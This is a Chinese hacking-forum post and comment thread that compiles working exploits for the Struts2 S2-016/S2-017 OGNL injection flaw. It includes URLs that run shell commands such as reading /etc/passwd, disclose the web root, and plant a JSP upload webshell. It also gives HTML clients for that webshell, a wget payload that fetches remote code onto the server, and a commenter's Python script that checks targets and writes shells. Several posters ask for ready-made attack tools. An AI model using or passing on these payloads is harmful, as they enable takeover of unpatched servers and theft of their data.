大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
喜欢就点一下感谢吧^_^
带回显命令执行:
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
爆路径:
http://www.example.com/struts2-blank/example/X.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
写文件:
http://www.example.com/struts2-blank/example/X.action?redirect:${ %23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'), %23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"), new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close() }&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
写入的文件内容:
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
其实就是一个jsp的小马,需要客户端配合
函数f是文件名,t是内容
客户端:
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post"> <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br> <input type=submit value="提交"> </form>
就在当前目录建立一个fjp.jsp
shell:http://www.example.com/struts2-blank/example/fjp.jsp
还有@园长的一个客户端:
<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <title>jsp-园长</title> </head> <style> .main{width:980px;height:600px;margin:0 auto;} .url{width:300px;} .fn{width:60px;} .content{width:80%;height:60%;} </style> <script> function upload(){ var url = document.getElementById('url').value, content = document.getElementById('content').value, fileName = document.getElementById('fn').value, form = document.getElementById('fm'); if(url.length == 0){ alert("Url not allowd empty!"); return ; } if(content.length == 0){ alert("Content not allowd empty!"); return ; } if(fileName.length == 0){ alert("FileName not allowd empty!"); return ; } form.action = url; form.submit(); } </script> <body> <div class="main"> <form id="fm" method="post"> URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/> FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" /> <a href="javascript:upload();">Upload</a><br/> <textarea id="content" class="content" name="t" ></textarea> </form> </div> </body> </html>
还有@X发的一个wget的getshell
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'} )).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
[原文地址]
相关讨论:
1#
DragonEgg | 2013-07-17 22:45
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
2#
Jewer (苦逼的人生。) | 2013-07-17 22:46
- -好吧!!我顶一下0 0
3#
Ivan | 2013-07-17 22:46
这个屌……
4#
DragonEgg | 2013-07-17 22:47
还有@X发的一个getshell
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'} )).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
5#
kissy | 2013-07-17 22:47
非常的感谢 楼主 求 工具啊
6#
修码的马修 | 2013-07-17 22:49
这……累趴多少黑阔
7#
kissy | 2013-07-17 22:50
这么先进的信息在什么地方 拿到的?
8#
rootsecurity | 2013-07-17 22:51
牛逼
9#
墨水心_Len | 2013-07-17 22:56
今天就是IT界的一个悲剧!
10#
Icyblade | 2013-07-17 23:06
Getshell的基本思路是先爆路径,然后通过路径上传小马(就是上传大马的马,url不能过长所以只能先传小马),然后用小马传大马。这里有点扯的是 http://a.com/b/c/d.action传上去的小马有可能在http://a.com/b/里面也有可能在http://a.com/b /c/里面,晚上写工具的时候一直在纠结这个问题,求大神拯救
11#
小胖胖要减肥 | 2013-07-17 23:14
@rootsecurity 京东的菊花
12#
kissy | 2013-07-17 23:14
@Icyblade 大神 你的工具是 用什么语言写的? 可以说说如何写工具吗?
13#
LauRen | 2013-07-17 23:16
求合成工具
14#
天朝城管 | 2013-07-17 23:43
一帮白帽子在wooyun上刷struts2,一帮黑帽子在地下脱裤。裤漏了,黑帽子溜了。白帽子被判刑x年,出来后感叹WQNMLGB
15#感谢(1)
DragonEgg | 2013-07-17 23:47
= =!点 感谢 啊。。
16#
LauRen | 2013-07-17 23:49
@DragonEgg 感谢以点
17#
isaac | 2013-07-17 23:53
# coding: utf-8 import string import random import urllib # 简单 POC bait = "".join(random.sample(list(string.letters), 32)) """ %{ #bait=new java.lang.String('test_str'), #resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(), #resp.println(#bait), #resp.flush(), #resp.close() } """ simple_poc = "%{" simple_poc += "#bait=new java.lang.String('{0}'),".format(bait) simple_poc += "#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter()," simple_poc += "#resp.println(#bait)," simple_poc += "#resp.flush()," simple_poc += "#resp.close()" simple_poc += "}" # 获取网站物理路径 """ %{ #req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'), #webroot=#req.getSession().getServletContext().getRealPath('/'), #resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(), #resp.println(#webroot), #resp.flush(), #resp.close() } """ webroot_exp = "%{" webroot_exp += "#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')," webroot_exp += "#webroot=#req.getSession().getServletContext().getRealPath('/')," webroot_exp += "#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter()," webroot_exp += "#resp.println(#webroot)," webroot_exp += "#resp.flush()," webroot_exp += "#resp.close()" webroot_exp += "}" # 执行命令 """ %{ #ps=(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start().getInputStream(), #buf=new char[50000], new java.io.BufferedReader(new java.io.InputStreamReader(#ps)).read(#buf), #resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(), #resp.println(#buf), #resp.flush(), #resp.close() } """ execute_exp = "%%{" execute_exp += "#ps=(new java.lang.ProcessBuilder(new java.lang.String[]{%s})).start().getInputStream()," execute_exp += "#buf=new char[50000]," execute_exp += "new java.io.BufferedReader(new java.io.InputStreamReader(#ps)).read(#buf)," execute_exp += "#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter()," execute_exp += "#resp.println(#buf)," execute_exp += "#resp.flush()," execute_exp += "#resp.close()" execute_exp += "}" # 写webshell """ %{ #req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'), #sio=new java.lang.StringBuffer(), #sio.append(#req.getRealPath(%s)), #response=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(), #response.println(#sio), #response.close(), #fos=new java.io.FileOutputStream(#sio), #fos.write(#req.getParameter('%s').getBytes()), #fos.close()} """ getshell_exp = "%%{" getshell_exp += "#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')," getshell_exp += "#sio=new java.lang.StringBuffer()," getshell_exp += "#sio.append(#req.getRealPath('%s'))," getshell_exp += "#response=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter()," getshell_exp += "#response.println(#sio)," getshell_exp += "#response.close()," getshell_exp += "#fos=new java.io.FileOutputStream(#sio)," getshell_exp += "#fos.write(#req.getParameter('%s').getBytes())," getshell_exp += "#fos.close()}" def test_simple_poc(url): for prefix in ["action:", "redirect:", "redirectAction:"]: if bait in urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(simple_poc))).read(): return True return False def test_webroot_exp(url): for prefix in ["action:", "redirect:", "redirectAction:"]: resp = urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(webroot_exp))).read().lower() if not resp.startswith("<html>") and not resp.endswith("</html>"): return resp def test_execute_exp(url): for prefix in ["action:", "redirect:", "redirectAction:"]: resp = urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(execute_exp % "'ifconfig'"))).read().lower() if not resp.startswith("<html>") and not resp.endswith("</html>"): return resp def test_getshell_exp(url): for prefix in ["action:", "redirect:", "redirectAction:"]: resp = urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(getshell_exp % ("shell.txt", "c"))), data="c=bazinga").read().lower() if not resp.startswith("<html>") and not resp.endswith("</html>"): return resp
18#
锄禾哥 ("%</a>&) | 2013-07-18 01:31
看到楼上的python 我都忍不住出来冒泡了。。。。好人一生平安。thank打码。
19#
dave | 2013-07-18 01:40
哈哈。。谢谢 提示 可以自己写工具了
20#
hack雪花 | 2013-07-18 02:03
@dave 求写的发[email protected]
21#
dave | 2013-07-18 02:25
@hack雪花 已经有现成的工具啦。我只不过当学习。这世界已经有轮子啦。哈哈
22#
HK骚年 | 2013-07-18 04:54
求具体详细利用思路。主要是写马那块的。QQ:498532059
23#
火星人 (不会技术活) | 2013-07-18 08:51
@小胖胖要减肥 截图完去啊
24#
无聊哥 | 2013-07-18 09:03
@天朝城管 不错的说法
本文“Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理”,来自:Nuclear'Atk 网络安全研究中心,本文地址:http://lcx.cc/?i=3733,转载请注明作者及出处!